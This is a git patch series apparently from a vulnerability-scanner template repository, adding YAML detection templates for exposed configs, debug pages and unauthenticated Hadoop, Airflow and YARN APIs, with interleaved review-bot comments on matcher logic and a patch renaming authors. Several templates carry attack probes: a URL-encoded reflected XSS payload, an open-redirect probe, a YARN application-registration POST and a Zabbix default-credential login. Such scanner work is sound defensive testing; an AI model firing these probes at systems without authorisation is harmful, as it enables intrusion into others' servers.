diff --git a/exposures/configs/amazon-docker-config-disclosure.yaml b/exposures/configs/amazon-docker-config-disclosure.yaml
new file mode 100755
index 0000000000..3dc66d5530
--- /dev/null
+++ b/exposures/configs/amazon-docker-config-disclosure.yaml
@@ -0,0 +1,17 @@
+id: amazon-docker-config-disclosure
+
+info:
+ name: Dockerrun AWS Configuration Exposure
+ author: Ice3man
+ severity: medium
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/Dockerrun.aws.json'
+ matchers:
+ - type: word
+ words:
+ - 'AWSEBDockerrunVersion'
+ - 'containerDefinitions'
+ condition: and
\ No newline at end of file
diff --git a/exposures/configs/ansible-config-disclosure.yaml b/exposures/configs/ansible-config-disclosure.yaml
new file mode 100755
index 0000000000..a07e675fbb
--- /dev/null
+++ b/exposures/configs/ansible-config-disclosure.yaml
@@ -0,0 +1,17 @@
+id: ansible-config-disclosure
+
+info:
+ name: Ansible Configuration Exposure
+ author: Ice3man
+ severity: medium
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/ansible.cfg'
+ matchers:
+ - type: word
+ words:
+ - '[defaults]'
+ - '[inventory]'
+ condition: and
\ No newline at end of file
diff --git a/exposures/configs/opcache-status-exposure.yaml b/exposures/configs/opcache-status-exposure.yaml
new file mode 100644
index 0000000000..26b0fd5a75
--- /dev/null
+++ b/exposures/configs/opcache-status-exposure.yaml
@@ -0,0 +1,20 @@
+id: opcache-status-exposure
+
+info:
+ name: OPcache Status Exposure
+ author: Ice3man
+ severity: low
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/opcache-status/"
+ - "{{BaseURL}}/php-opcache-status/"
+ - "{{BaseURL}}/opcache-status/opcache.php"
+ matchers:
+ - type: word
+ words:
+ - "opcache_enabled"
+ - "opcache_hit_rate"
+ condition: and
+ part: body
\ No newline at end of file
diff --git a/exposures/configs/perl-status.yaml b/exposures/configs/perl-status.yaml
new file mode 100755
index 0000000000..6e65332db7
--- /dev/null
+++ b/exposures/configs/perl-status.yaml
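Review bot: The amazon-docker-config-disclosure matcher requires both `AWSEBDockerrunVersion` and `containerDefinitions`, but `containerDefinitions` only exists in the multi-container (version 2) Dockerrun.aws.json layout, so an exposed single-container file would be missed even though it carries the same deployment details. If version 1 files are in scope, matching on `AWSEBDockerrunVersion` alone (dropping the second word and `condition: and`) covers both layouts, and that key is distinctive enough by itself. The ansible-config-disclosure hunk in this line has a similar gap: `[inventory]` appears to be an optional section, so an ansible.cfg that only contains `[defaults]` would not match; treat that as something to confirm against a few real files.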
@@ -0,0 +1,17 @@
+id: perl-status
+
+info:
+ name: Apache mod_perl Status Page Exposure
+ author: Ice3man
+ severity: medium
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/perl-status'
+ matchers:
+ - type: word
+ words:
+ - "Apache2::Status"
+ - "Perl version"
+ condition: and
\ No newline at end of file
diff --git a/exposures/configs/rails-database-config.yaml b/exposures/configs/rails-database-config.yaml
new file mode 100644
index 0000000000..4461c3b86b
--- /dev/null
+++ b/exposures/configs/rails-database-config.yaml
@@ -0,0 +1,18 @@
+id: rails-database-config
+
+info:
+ name: Ruby-on-Rails Database Configuration Exposure
+ author: Ice3man
+ severity: low
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/config/database.yml"
+ matchers:
+ - type: word
+ words:
+ - "adapter:"
+ - "database:"
+ condition: and
+ part: body
\ No newline at end of file
diff --git a/exposures/configs/symfony-database-config.yaml b/exposures/configs/symfony-database-config.yaml
new file mode 100755
index 0000000000..b116547087
--- /dev/null
+++ b/exposures/configs/symfony-database-config.yaml
@@ -0,0 +1,18 @@
+id: symfony-database-config
+
+info:
+ name: Symfony Database Configuration Exposure
+ author: Ice3man
+ severity: high
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/config/databases.yml"
+ matchers:
+ - type: word
+ words:
+ - "class:"
+ - "param:"
+ condition: and
+ part: body
\ No newline at end of file
diff --git a/exposures/configs/symfony-profiler.yaml b/exposures/configs/symfony-profiler.yaml
new file mode 100644
index 0000000000..6b7b9d5810
--- /dev/null
+++ b/exposures/configs/symfony-profiler.yaml
@@ -0,0 +1,18 @@
+id: symfony-profiler
+
+info:
+ name: Symfony Profiler
+ author: ice3man
+ severity: high
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/_profiler/empty/search/results?limit=10"
+ matchers:
+ - type: word
+ words:
+ - "<title>Symfony Profiler"
+ - "symfony/profiler/"
+ condition: and
+ part: body
\ No newline at end of file
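Review bot: rails-database-config is rated `severity: low` while symfony-database-config in the following hunk, which detects the same class of finding (a database configuration file served over HTTP), is rated `severity: high`; a publicly readable `config/database.yml` normally holds the database host, user and password, so the two templates should carry the same rating. I would change the rails hunk to `severity: high` or, if the lower rating is deliberate, add a `description:` explaining why. The rails matcher also has no status check, so a custom error page that happens to echo `adapter:` and `database:` text would match, but that is secondary to the severity inconsistency.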
diff --git a/exposures/logs/rails-debug-mode.yaml b/exposures/logs/rails-debug-mode.yaml
new file mode 100644
index 0000000000..f696b5ce6c
--- /dev/null
+++ b/exposures/logs/rails-debug-mode.yaml
@@ -0,0 +1,18 @@
+id: rails-debug-mode
+
+info:
+ name: Rails Debug Mode Enabled
+ author: ice3man
+ severity: medium
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/1238a92f573a48e58d356c42ca2c9610"
+ matchers:
+ - type: word
+ words:
+ - "Rails.root:"
+ - "Action Controller: Exception caught"
+ condition: and
+ part: body
\ No newline at end of file
diff --git a/exposures/logs/struts-debug-mode.yaml b/exposures/logs/struts-debug-mode.yaml
new file mode 100644
index 0000000000..0ec3c41f8e
--- /dev/null
+++ b/exposures/logs/struts-debug-mode.yaml
@@ -0,0 +1,17 @@
+id: struts-debug-mode
+
+info:
+ name: Apache Struts setup in Debug-Mode
+ author: Ice3man
+ severity: low
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/'
+ matchers:
+ - type: word
+ words:
+ - ""
+ - ""
+ condition: and
\ No newline at end of file
diff --git a/misconfiguration/airflow-api-exposure.yaml b/misconfiguration/airflow-api-exposure.yaml
new file mode 100755
index 0000000000..0efc1b2c65
--- /dev/null
+++ b/misconfiguration/airflow-api-exposure.yaml
@@ -0,0 +1,17 @@
+id: airflow-api-exposure
+
+info:
+ name: Apache Airflow API Exposure / Unauthenticated Access
+ author: Ice3man
+ severity: medium
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/api/experimental/latest_runs'
+ matchers:
+ - type: word
+ words:
+ - '"dag_run_url":'
+ - '{"items":['
+ condition: and
\ No newline at end of file
diff --git a/misconfiguration/hadoop-unauth.yaml b/misconfiguration/hadoop-unauth.yaml
new file mode 100644
index 0000000000..825453b763
--- /dev/null
+++ b/misconfiguration/hadoop-unauth.yaml
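Review bot: As shown here, both entries under `words:` in the struts-debug-mode hunk are empty strings (`- ""`), and an empty word is contained in every response, so with `condition: and` the matcher fires on every host that answers on `/` and the template reports debug mode everywhere. If the intended values were HTML-comment markers that this rendering stripped, the committed file should be checked to confirm they survived; otherwise the words need the actual debug-mode markers Struts emits. In either case a `type: status` matcher next to the word matcher would cut the noise from error pages.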
@@ -0,0 +1,17 @@
+id: hadoop-unauth
+
+info:
+ name: Apache Hadoop Unauth
+ author: Ice3man
+ severity: low
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/ws/v1/cluster/info'
+ matchers:
+ - type: word
+ words:
+ - 'hadoopVersion'
+ - 'resourceManagerVersionBuiltOn'
+ condition: and
\ No newline at end of file
diff --git a/vulnerabilities/other/acme-xss.yaml b/vulnerabilities/other/acme-xss.yaml
new file mode 100755
index 0000000000..5a5e4e8ef5
--- /dev/null
+++ b/vulnerabilities/other/acme-xss.yaml
@@ -0,0 +1,20 @@
+id: acme-xss
+
+info:
+ name: ACME / Let's Encrypt Reflected XSS
+ author: Ice3man
+ severity: low
+
+requests:
+ - method: GET
+ path:
+ - '{{BaseURL}}/.well-known/acme-challenge/%3C%3fxml%20version=%221.0%22%3f%3E%3Cx:script%20xmlns:x=%22http://www.w3.org/1999/xhtml%22%3Ealert%28document.domain%26%23x29%3B%3C/x:script%3E'
+ matchers:
+ - type: word
+ words:
+ - "alert(document.domain)"
+ - type: word
+ words:
+ - "/xml"
+ - "/html"
+ matchers-condition: and
\ No newline at end of file
diff --git a/vulnerabilities/other/aspnuke-openredirect.yaml b/vulnerabilities/other/aspnuke-openredirect.yaml
new file mode 100644
index 0000000000..cef9244755
--- /dev/null
+++ b/vulnerabilities/other/aspnuke-openredirect.yaml
@@ -0,0 +1,15 @@
+id: aspnuke-openredirect
+info:
+ name: ASP-Nuke Open Redirect
+ author: Ice3man
+ severity: low
+
+requests:
+ - method: GET
+ path:
+ - "{{BaseURL}}/gotoURL.asp?url=google.com&id=43569"
+ matchers:
+ - type: regex
+ part: body
+ regex:
+ - '(?m)^(?:Location\s*:\s*)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?google\.com(?:\s*)$'
\ No newline at end of file
diff --git a/vulnerabilities/other/yarn-resourcemanager-rce.yaml b/vulnerabilities/other/yarn-resourcemanager-rce.yaml
new file mode 100755
index 0000000000..ddc7fc4c4c
--- /dev/null
+++ b/vulnerabilities/other/yarn-resourcemanager-rce.yaml
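Review bot: The second word matcher in acme-xss lists `"/xml"` and `"/html"` with no `part`, so they are searched in the response body rather than in the Content-Type header they appear to be meant for; with the default body part a response that already satisfies the first matcher is not guaranteed to contain either token, and unrelated body text can satisfy it on its own. Adding `part: header` to that matcher turns it into the content-type check the `matchers-condition: and` seems to intend, which is what separates a real reflection from a payload echoed as plain text. If the body really is the target, a note in `info:` saying so would stop the next reader from making the same correction.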
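Review bot: The aspnuke-openredirect regex is anchored on a `Location:` line, which is a response header, yet the matcher sets `part: body`; the header is never part of the body, so as written the template cannot match a genuine redirect. Change it to `part: header`. A `type: status` matcher for `302` combined with `matchers-condition: and` would additionally rule out pages that merely echo the supplied URL in text, as the yarn-resourcemanager-rce hunk in this patch already does for its own check.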
@@ -0,0 +1,19 @@
+id: yarn-resourcemanager-rce
+
+info:
+ name: Apache Yarn ResourceManager RCE
+ author: Ice3man
+ severity: low
+
+requests:
+ - method: POST
+ path:
+ - '{{BaseURL}}/ws/v1/cluster/apps/new-application'
+ matchers:
+ - type: word
+ words:
+ - 'application-id'
+ - type: status
+ status:
+ - 200
+ matchers-condition: and
\ No newline at end of file
From a52ffe5c4e07e8b7b4a997373d17f32df6c78aef Mon Sep 17 00:00:00 2001
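Review bot: yarn-resourcemanager-rce is named as an RCE but carries `severity: low`, and what it verifies is narrower than the name: a POST to `/ws/v1/cluster/apps/new-application` that answers `200` with `application-id` shows the ResourceManager REST API accepts unauthenticated application registration, which is the precondition for the known abuse rather than code execution itself. Either the severity should reflect an unauthenticated administrative API (the sibling yarn-manager-exposure is rated low for a read-only panel, and this is strictly more) or the name should say what is actually checked. The request is also state-changing, since the endpoint appears to allocate an application id on the target, which deserves a `description:` line so operators know the scan leaves a trace in the ResourceManager's application list.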
From: team-projectdiscovery <8293321+bauthard@users.noreply.github.com> Date: Sun, 10 Jan 2021 19:45:36 +0530 Subject: [PATCH 30/85] fixes and updates --- cves/2017/CVE-2017-9506.yaml | 2 +- cves/2018/CVE-2018-7251.yaml | 2 +- cves/2018/CVE-2018-8006.yaml | 2 +- cves/2019/CVE-2019-10092.yaml | 2 +- cves/2019/CVE-2019-14223.yaml | 3 ++- cves/2019/CVE-2019-7219.yaml | 2 +- cves/2019/CVE-2019-9955.yaml | 2 +- cves/2020/CVE-2020-1943.yaml | 2 +- default-logins/activemq/activemq-default-login.yaml | 2 +- default-logins/ambari-default-credentials.yaml | 2 +- default-logins/ofbiz-default-credentials.yaml | 2 +- default-logins/zabbix-default-credentials.yaml | 7 +++++-- exposed-panels/active-admin-exposure.yaml | 2 +- exposed-panels/activemq-panel.yaml | 2 +- exposed-panels/adminer-exposure.yaml | 2 +- exposed-panels/airflow-exposure.yaml | 2 +- exposed-panels/ambari-exposure.yaml | 2 +- exposed-panels/ansible-tower-exposure.yaml | 2 +- exposed-panels/couchdb-exposure.yaml | 2 +- exposed-panels/couchdb-fauxton.yaml | 2 +- exposed-panels/django-admin-panel.yaml | 2 +- exposed-panels/druid-console-exposure.yaml | 2 +- exposed-panels/exposed-pagespeed-global-admin.yaml | 2 +- exposed-panels/exposed-webalizer.yaml | 2 +- exposed-panels/flink-exposure.yaml | 2 +- exposed-panels/hadoop-exposure.yaml | 2 +- exposed-panels/kafka-connect-ui.yaml | 2 +- exposed-panels/kafka-monitoring.yaml | 2 +- exposed-panels/kafka-topics-ui.yaml | 2 +- exposed-panels/kubernetes-dashboard.yaml | 2 +- exposed-panels/rocketmq-console-exposure.yaml | 2 +- exposed-panels/selenoid-ui-exposure.yaml | 2 +- exposed-panels/setup-page-exposure.yaml | 2 +- exposed-panels/solr-exposure.yaml | 2 +- exposed-panels/yarn-manager-exposure.yaml | 2 +- exposed-panels/zipkin-exposure.yaml | 2 +- exposures/apis/swagger-api.yaml | 2 +- exposures/configs/airflow-configuration-exposure.yaml | 2 +- exposures/configs/amazon-docker-config-disclosure.yaml | 2 +- exposures/configs/ansible-config-disclosure.yaml | 2 +- 
exposures/configs/git-config.yaml | 2 +- exposures/configs/opcache-status-exposure.yaml | 2 +- exposures/configs/perl-status.yaml | 2 +- exposures/configs/rails-database-config.yaml | 2 +- exposures/configs/symfony-database-config.yaml | 2 +- exposures/configs/symfony-profiler.yaml | 2 +- exposures/logs/rails-debug-mode.yaml | 2 +- exposures/logs/struts-debug-mode.yaml | 2 +- misconfiguration/airflow-api-exposure.yaml | 2 +- misconfiguration/hadoop-unauth.yaml | 2 +- vulnerabilities/other/acme-xss.yaml | 2 +- vulnerabilities/other/aspnuke-openredirect.yaml | 3 ++- vulnerabilities/other/yarn-resourcemanager-rce.yaml | 2 +- 53 files changed, 59 insertions(+), 54 deletions(-) diff --git a/cves/2017/CVE-2017-9506.yaml b/cves/2017/CVE-2017-9506.yaml index 0224932158..9106898094 100644 --- a/cves/2017/CVE-2017-9506.yaml +++ b/cves/2017/CVE-2017-9506.yaml @@ -2,7 +2,7 @@ id: CVE-2017-9506 info: name: Jira IconURIServlet SSRF - author: Ice3man + author: pd-team severity: high description: The IconUriServlet of the Atlassian OAuth Plugin from version 1.3.0 before version 1.9.12 and from version 2.0.0 before version 2.0.4 allows remote attackers to access the content of internal network resources and/or perform an XSS attack via Server Side Request Forgery (SSRF). diff --git a/cves/2018/CVE-2018-7251.yaml b/cves/2018/CVE-2018-7251.yaml index cf0487f22b..c5dbe3dde3 100644 --- a/cves/2018/CVE-2018-7251.yaml +++ b/cves/2018/CVE-2018-7251.yaml @@ -2,7 +2,7 @@ id: CVE-2018-7251 info: name: AnchorCMS Error Log Exposure - author: Ice3man + author: pd-team severity: medium requests: diff --git a/cves/2018/CVE-2018-8006.yaml b/cves/2018/CVE-2018-8006.yaml index bcf53c36ba..a8d25e7428 100644 --- a/cves/2018/CVE-2018-8006.yaml +++ b/cves/2018/CVE-2018-8006.yaml @@ -2,7 +2,7 @@ id: CVE-2018-8006 info: name: Apache ActiveMQ XSS - author: Ice3man + author: pd-team severity: medium requests: 
diff --git a/cves/2019/CVE-2019-10092.yaml b/cves/2019/CVE-2019-10092.yaml index 1531fab12e..db7cdb6215 100644 --- a/cves/2019/CVE-2019-10092.yaml +++ b/cves/2019/CVE-2019-10092.yaml @@ -2,7 +2,7 @@ id: CVE-2019-10092 info: name: Apache mod_proxy HTML Injection / Partial XSS - author: Ice3man + author: pd-team severity: medium requests: diff --git a/cves/2019/CVE-2019-14223.yaml b/cves/2019/CVE-2019-14223.yaml index d0fca33dbf..8406ec8b67 100644 --- a/cves/2019/CVE-2019-14223.yaml +++ b/cves/2019/CVE-2019-14223.yaml @@ -1,7 +1,8 @@ id: CVE-2019-14223 + info: name: Alfresco Share Open Redirect - author: Ice3man + author: pd-team severity: low requests: diff --git a/cves/2019/CVE-2019-7219.yaml b/cves/2019/CVE-2019-7219.yaml index 3aa09e4f66..6fbcfa0e23 100644 --- a/cves/2019/CVE-2019-7219.yaml +++ b/cves/2019/CVE-2019-7219.yaml @@ -2,7 +2,7 @@ id: CVE-2019-7219 info: name: Zarafa WebApp Reflected XSS - author: Ice3man + author: pd-team severity: low requests: diff --git a/cves/2019/CVE-2019-9955.yaml b/cves/2019/CVE-2019-9955.yaml index d10d7f49b7..ba1718a61a 100644 --- a/cves/2019/CVE-2019-9955.yaml +++ b/cves/2019/CVE-2019-9955.yaml @@ -2,7 +2,7 @@ id: CVE-2019-9955 info: name: CVE-2019-9955 Zyxel XSS - author: Ice3man + author: pd-team severity: low requests: diff --git a/cves/2020/CVE-2020-1943.yaml b/cves/2020/CVE-2020-1943.yaml index 764f723364..6f7d1d6a1d 100644 --- a/cves/2020/CVE-2020-1943.yaml +++ b/cves/2020/CVE-2020-1943.yaml @@ -2,7 +2,7 @@ id: CVE-2020-1943 info: name: Apache OFBiz Reflected XSS - author: Ice3man + author: pd-team severity: medium requests: diff --git a/default-logins/activemq/activemq-default-login.yaml b/default-logins/activemq/activemq-default-login.yaml index c6546895c8..fb1f8264f8 100644 --- a/default-logins/activemq/activemq-default-login.yaml +++ b/default-logins/activemq/activemq-default-login.yaml 
@@ -2,7 +2,7 @@ id: activemq-default-login info: name: Apache ActiveMQ Default Credentials - author: Ice3man + author: pd-team severity: medium requests: diff --git a/default-logins/ambari-default-credentials.yaml b/default-logins/ambari-default-credentials.yaml index fe461837dd..2f3c715a24 100755 --- a/default-logins/ambari-default-credentials.yaml +++ b/default-logins/ambari-default-credentials.yaml @@ -2,7 +2,7 @@ id: ambari-default-credentials info: name: Apache Ambari Default Credentials - author: Ice3man + author: pd-team severity: medium requests: diff --git a/default-logins/ofbiz-default-credentials.yaml b/default-logins/ofbiz-default-credentials.yaml index 8f9d9c1374..cd855650ed 100755 --- a/default-logins/ofbiz-default-credentials.yaml +++ b/default-logins/ofbiz-default-credentials.yaml @@ -2,7 +2,7 @@ id: ofbiz-default-credentials info: name: Apache OfBiz Default Credentials - author: Ice3man + author: pd-team severity: medium requests: diff --git a/default-logins/zabbix-default-credentials.yaml b/default-logins/zabbix-default-credentials.yaml index 5202d88398..7bbdf1d241 100755 --- a/default-logins/zabbix-default-credentials.yaml +++ b/default-logins/zabbix-default-credentials.yaml @@ -2,7 +2,7 @@ id: zabbix-default-credentials info: name: Zabbix Default Credentials - author: Ice3man + author: pd-team severity: critical requests: @@ -13,10 +13,13 @@ requests: - Content-Type: application/x-www-form-urlencoded; charset=UTF-8 - X-Requested-With: XMLHttpRequest body: name=Admin&password=zabbix&autologin=1&enter=Sign+in + matchers-condition: and matchers: - type: word words: - "zabbix.php?action=dashboard.view" + - type: status - status: 302 \ No newline at end of file + status: + - 302 \ No newline at end of file diff --git a/exposed-panels/active-admin-exposure.yaml b/exposed-panels/active-admin-exposure.yaml index 0654ef10c2..75933eb847 100755 --- a/exposed-panels/active-admin-exposure.yaml +++ b/exposed-panels/active-admin-exposure.yaml 
@@ -2,7 +2,7 @@ id: active-admin-exposure info: name: ActiveAdmin Admin Dasboard Exposure - author: Ice3man + author: pd-team severity: medium requests: diff --git a/exposed-panels/activemq-panel.yaml b/exposed-panels/activemq-panel.yaml index 9265ab0e96..7038f3640f 100755 --- a/exposed-panels/activemq-panel.yaml +++ b/exposed-panels/activemq-panel.yaml @@ -2,7 +2,7 @@ id: activemq-panel info: name: Apache ActiveMQ Exposure - author: Ice3man + author: pd-team severity: info requests: diff --git a/exposed-panels/adminer-exposure.yaml b/exposed-panels/adminer-exposure.yaml index 1e0a0e3326..265940f3ea 100755 --- a/exposed-panels/adminer-exposure.yaml +++ b/exposed-panels/adminer-exposure.yaml @@ -2,7 +2,7 @@ id: adminer-exposure info: name: Adminer Exposure - author: Ice3man + author: pd-team severity: medium requests: diff --git a/exposed-panels/airflow-exposure.yaml b/exposed-panels/airflow-exposure.yaml index b02e422796..f4693188bc 100755 --- a/exposed-panels/airflow-exposure.yaml +++ b/exposed-panels/airflow-exposure.yaml @@ -2,7 +2,7 @@ id: airflow-exposure info: name: Apache Airflow Exposure / Unauthenticated Access - author: Ice3man + author: pd-team severity: medium requests: diff --git a/exposed-panels/ambari-exposure.yaml b/exposed-panels/ambari-exposure.yaml index b44f058832..aa2121f3d5 100644 --- a/exposed-panels/ambari-exposure.yaml +++ b/exposed-panels/ambari-exposure.yaml @@ -2,7 +2,7 @@ id: ambari-exposure info: name: Apache Ambari Exposure / Unauthenticated Access - author: Ice3man + author: pd-team severity: medium requests: diff --git a/exposed-panels/ansible-tower-exposure.yaml b/exposed-panels/ansible-tower-exposure.yaml index 11de49fcfc..0ef45ced7f 100644 --- a/exposed-panels/ansible-tower-exposure.yaml +++ b/exposed-panels/ansible-tower-exposure.yaml @@ -2,7 +2,7 @@ id: ansible-tower-exposure info: name: Ansible Tower Exposure - author: Ice3man + author: pd-team severity: low requests: 
diff --git a/exposed-panels/couchdb-exposure.yaml b/exposed-panels/couchdb-exposure.yaml index 68942ed1f2..46fbac50a7 100755 --- a/exposed-panels/couchdb-exposure.yaml +++ b/exposed-panels/couchdb-exposure.yaml @@ -2,7 +2,7 @@ id: couchdb-exposure info: name: Apache CouchDB Exposure - author: Ice3man + author: pd-team severity: low requests: diff --git a/exposed-panels/couchdb-fauxton.yaml b/exposed-panels/couchdb-fauxton.yaml index f5d9d52103..00135ebf18 100755 --- a/exposed-panels/couchdb-fauxton.yaml +++ b/exposed-panels/couchdb-fauxton.yaml @@ -2,7 +2,7 @@ id: couchdb-fauxton info: name: Apache CouchDB Fauxton Exposure - author: Ice3man + author: pd-team severity: low requests: diff --git a/exposed-panels/django-admin-panel.yaml b/exposed-panels/django-admin-panel.yaml index 30dc04e6c4..17d2cbf5b8 100644 --- a/exposed-panels/django-admin-panel.yaml +++ b/exposed-panels/django-admin-panel.yaml @@ -2,7 +2,7 @@ id: django-admin-panel info: name: Python Django Admin Panel - author: Ice3man + author: pd-team severity: low requests: diff --git a/exposed-panels/druid-console-exposure.yaml b/exposed-panels/druid-console-exposure.yaml index fd70fd8bf0..b0cc838eed 100755 --- a/exposed-panels/druid-console-exposure.yaml +++ b/exposed-panels/druid-console-exposure.yaml @@ -2,7 +2,7 @@ id: druid-console-exposure info: name: Alibaba Druid Console Exposure - author: Ice3man + author: pd-team severity: medium requests: diff --git a/exposed-panels/exposed-pagespeed-global-admin.yaml b/exposed-panels/exposed-pagespeed-global-admin.yaml index 568072f374..827b030430 100755 --- a/exposed-panels/exposed-pagespeed-global-admin.yaml +++ b/exposed-panels/exposed-pagespeed-global-admin.yaml @@ -2,7 +2,7 @@ id: exposed-pagespeed-global-admin info: name: Apache PageSpeed Global Admin Dashboard Exposure - author: Ice3man + author: pd-team severity: medium requests: diff --git a/exposed-panels/exposed-webalizer.yaml b/exposed-panels/exposed-webalizer.yaml index 21f33ad15a..e7cbd72b58 100644 
--- a/exposed-panels/exposed-webalizer.yaml +++ b/exposed-panels/exposed-webalizer.yaml @@ -2,7 +2,7 @@ id: exposed-webalizer info: name: Publicly exposed Webalizer Interface - author: Ice3man + author: pd-team severity: low requests: diff --git a/exposed-panels/flink-exposure.yaml b/exposed-panels/flink-exposure.yaml index 155c090b58..e8cee03f5c 100755 --- a/exposed-panels/flink-exposure.yaml +++ b/exposed-panels/flink-exposure.yaml @@ -2,7 +2,7 @@ id: flink-exposure info: name: Apache Flink Exposure - author: Ice3man + author: pd-team severity: low requests: diff --git a/exposed-panels/hadoop-exposure.yaml b/exposed-panels/hadoop-exposure.yaml index efefde4127..83df2717f3 100755 --- a/exposed-panels/hadoop-exposure.yaml +++ b/exposed-panels/hadoop-exposure.yaml @@ -2,7 +2,7 @@ id: hadoop-exposure info: name: Apache Hadoop Exposure - author: Ice3man + author: pd-team severity: low requests: diff --git a/exposed-panels/kafka-connect-ui.yaml b/exposed-panels/kafka-connect-ui.yaml index 973910c087..687c26364e 100755 --- a/exposed-panels/kafka-connect-ui.yaml +++ b/exposed-panels/kafka-connect-ui.yaml @@ -2,7 +2,7 @@ id: kafka-connect-ui info: name: Apache Kafka Connect UI Exposure - author: Ice3man + author: pd-team severity: low requests: diff --git a/exposed-panels/kafka-monitoring.yaml b/exposed-panels/kafka-monitoring.yaml index c6d4183b66..326b562280 100755 --- a/exposed-panels/kafka-monitoring.yaml +++ b/exposed-panels/kafka-monitoring.yaml @@ -2,7 +2,7 @@ id: kafka-monitoring info: name: Apache Kafka Monitor Exposure - author: Ice3man + author: pd-team severity: low requests: diff --git a/exposed-panels/kafka-topics-ui.yaml b/exposed-panels/kafka-topics-ui.yaml index 8e4a823e28..288fffdaa1 100755 --- a/exposed-panels/kafka-topics-ui.yaml +++ b/exposed-panels/kafka-topics-ui.yaml @@ -2,7 +2,7 @@ id: kafka-topics-ui info: name: Apache Kafka Topics UI Exposure - author: Ice3man + author: pd-team severity: low requests: 
diff --git a/exposed-panels/kubernetes-dashboard.yaml b/exposed-panels/kubernetes-dashboard.yaml index b50e6d4155..341bd3be10 100644 --- a/exposed-panels/kubernetes-dashboard.yaml +++ b/exposed-panels/kubernetes-dashboard.yaml @@ -2,7 +2,7 @@ id: kubernetes-dashboard info: name: Kubernetes Console Exposure - author: Ice3man + author: pd-team severity: low requests: diff --git a/exposed-panels/rocketmq-console-exposure.yaml b/exposed-panels/rocketmq-console-exposure.yaml index 26c5fe99bc..4ba0f94f82 100755 --- a/exposed-panels/rocketmq-console-exposure.yaml +++ b/exposed-panels/rocketmq-console-exposure.yaml @@ -2,7 +2,7 @@ id: rocketmq-console-exposure info: name: Apache RocketMQ Console Exposure - author: Ice3man + author: pd-team severity: medium requests: diff --git a/exposed-panels/selenoid-ui-exposure.yaml b/exposed-panels/selenoid-ui-exposure.yaml index 4742cd906d..69752f1412 100755 --- a/exposed-panels/selenoid-ui-exposure.yaml +++ b/exposed-panels/selenoid-ui-exposure.yaml @@ -2,7 +2,7 @@ id: selenoid-ui-exposure info: name: Selenoid UI Dashboard Exposure - author: Ice3man + author: pd-team severity: medium requests: diff --git a/exposed-panels/setup-page-exposure.yaml b/exposed-panels/setup-page-exposure.yaml index a2903098fe..8263823b24 100755 --- a/exposed-panels/setup-page-exposure.yaml +++ b/exposed-panels/setup-page-exposure.yaml @@ -2,7 +2,7 @@ id: setup-page-exposure info: name: Zenphoto Setup Page Exposure - author: Ice3man + author: pd-team severity: medium description: Misconfiguration on Zenphoto version < 1.5.X which lead to sensitive information disclosure diff --git a/exposed-panels/solr-exposure.yaml b/exposed-panels/solr-exposure.yaml index 21f878068d..eeb98e2544 100755 --- a/exposed-panels/solr-exposure.yaml +++ b/exposed-panels/solr-exposure.yaml @@ -2,7 +2,7 @@ id: solr-exposure info: name: Apache Solr Exposure - author: Ice3man + author: pd-team severity: medium requests: 
diff --git a/exposed-panels/yarn-manager-exposure.yaml b/exposed-panels/yarn-manager-exposure.yaml index bb17c90f1d..dfa85796e6 100755 --- a/exposed-panels/yarn-manager-exposure.yaml +++ b/exposed-panels/yarn-manager-exposure.yaml @@ -2,7 +2,7 @@ id: yarn-manager-exposure info: name: Apache Yarn ResourceManager Exposure / Unauthenticated Access - author: Ice3man + author: pd-team severity: low requests: diff --git a/exposed-panels/zipkin-exposure.yaml b/exposed-panels/zipkin-exposure.yaml index 4a0e2b1646..c8b60f1cfa 100755 --- a/exposed-panels/zipkin-exposure.yaml +++ b/exposed-panels/zipkin-exposure.yaml @@ -2,7 +2,7 @@ id: zipkin-exposure info: name: Zipkin Exposure - author: Ice3man + author: pd-team severity: low requests: diff --git a/exposures/apis/swagger-api.yaml b/exposures/apis/swagger-api.yaml index b02f519310..8692b19eae 100644 --- a/exposures/apis/swagger-api.yaml +++ b/exposures/apis/swagger-api.yaml @@ -2,7 +2,7 @@ id: swagger-apis info: name: Swagger API Panel - author: Ice3man + author: pd-team severity: info requests: diff --git a/exposures/configs/airflow-configuration-exposure.yaml b/exposures/configs/airflow-configuration-exposure.yaml index 6bbb2fe2ce..8a8eef4c0d 100755 --- a/exposures/configs/airflow-configuration-exposure.yaml +++ b/exposures/configs/airflow-configuration-exposure.yaml @@ -2,7 +2,7 @@ id: airflow-configuration-exposure info: name: Apache Airflow Configuration Exposure - author: Ice3man + author: pd-team severity: medium requests: diff --git a/exposures/configs/amazon-docker-config-disclosure.yaml b/exposures/configs/amazon-docker-config-disclosure.yaml index 3dc66d5530..09a6a75bd0 100755 --- a/exposures/configs/amazon-docker-config-disclosure.yaml +++ b/exposures/configs/amazon-docker-config-disclosure.yaml @@ -2,7 +2,7 @@ id: amazon-docker-config-disclosure info: name: Dockerrun AWS Configuration Exposure - author: Ice3man + author: pd-team severity: medium requests: 
diff --git a/exposures/configs/ansible-config-disclosure.yaml b/exposures/configs/ansible-config-disclosure.yaml index a07e675fbb..5492ef2c7d 100755 --- a/exposures/configs/ansible-config-disclosure.yaml +++ b/exposures/configs/ansible-config-disclosure.yaml @@ -2,7 +2,7 @@ id: ansible-config-disclosure info: name: Ansible Configuration Exposure - author: Ice3man + author: pd-team severity: medium requests: diff --git a/exposures/configs/git-config.yaml b/exposures/configs/git-config.yaml index de93c88ba0..30149315e8 100644 --- a/exposures/configs/git-config.yaml +++ b/exposures/configs/git-config.yaml @@ -2,7 +2,7 @@ id: git-config info: name: Git Config Disclosure - author: Ice3man & pikpikcu + author: pd-team & pikpikcu severity: medium description: Searches for the pattern /.git/config on passed URLs. diff --git a/exposures/configs/opcache-status-exposure.yaml b/exposures/configs/opcache-status-exposure.yaml index 26b0fd5a75..cfcad72853 100644 --- a/exposures/configs/opcache-status-exposure.yaml +++ b/exposures/configs/opcache-status-exposure.yaml @@ -2,7 +2,7 @@ 